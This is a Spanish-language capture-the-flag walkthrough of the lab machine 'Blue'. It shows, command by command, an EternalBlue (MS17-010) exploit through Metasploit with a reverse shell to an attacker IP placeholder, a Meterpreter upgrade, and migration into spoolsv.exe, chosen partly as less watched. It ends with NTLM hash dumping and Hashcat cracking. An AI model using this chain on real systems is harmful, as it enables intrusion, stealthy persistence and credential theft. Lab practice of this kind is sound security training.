Blue es una máquina Windows clásica vulnerable al exploit EternalBlue (MS17-010), la misma vulnerabilidad usada por el ransomware WannaCry. Se explota con Metasploit para obtener acceso como SYSTEM directamente. Luego se extraen hashes NTLM con hashdump, se migra el proceso para estabilizar la sesión y se descifran las contraseñas con Hashcat.
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server (RDP)
nxc smb 10.67.141.205 -M ms17-010
# [+] SMB 10.67.141.205 445 BLUE [*] Windows 7 Professional 7601 x64
# [+] VULNERABLE to MS17-010
msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 10.67.141.205
set LHOST TU_IP
set LPORT 4444
run
# Resultado: shell como NT AUTHORITY\SYSTEM (máximos privilegios directo)
Upgradeamos la shell básica a Meterpreter para tener más capacidades:
# Mandar sesión al background
Ctrl+Z
# Upgradear a Meterpreter
sessions -u -1
sessions -i 2 # entrar a la nueva sesión Meterpreter
Para estabilizar la conexión, migramos a un proceso del sistema más robusto. spoolsv.exe (cola de impresión) es ideal: es estable, espera comunicación externa y es menos vigilado que lsass.exe o services.exe.
ps # listar procesos
# buscar spoolsv.exe y tomar su PID
migrate [PID_DE_SPOOLSV]
# [*] Successfully migrated to process
hashdump
# Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
# Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
# Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::
El formato es Usuario:RID:LM_Hash:NTLM_Hash:::. El hash interesante es el de Jon (NTLM): ffb43f0de35be4d9917ac0cc8ad57f8d.
echo "ffb43f0de35be4d9917ac0cc8ad57f8d" > hash_jon.txt
hashcat -m 1000 -a 0 hash_jon.txt /usr/share/wordlists/rockyou.txt
# -m 1000: tipo NTLM
# -a 0: ataque de diccionario
# Resultado: alqfna22
C:\C:\Windows\System32\configC:\Users\Jon\Documents